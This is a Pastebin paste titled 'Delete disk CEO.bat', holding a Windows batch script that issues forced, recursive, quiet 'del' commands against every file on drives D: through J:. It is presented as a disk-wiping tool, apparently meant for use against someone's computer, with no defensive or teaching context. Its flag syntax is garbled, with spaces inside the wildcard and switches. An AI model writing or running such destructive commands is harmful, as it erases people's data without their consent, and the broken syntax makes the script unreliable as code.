JackHaxor

Delete disk CEO.bat

May 14th, 2017
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.21 KB | None | 0 0
  1. @echo off
  2.  
  3. del D: *. * / f / s / q
  4.  
  5. del E: *. * / f / s / q
  6.  
  7. del F: *. * / f / s / q
  8.  
  9. del G: *. * / f / s / q
  10.  
  11. del H: *. * / f / s / q
  12.  
  13. del I: *. * / f / s / q
  14.  
  15. del J: *. * / f / s / q
Add Comment
Please, Sign In to add comment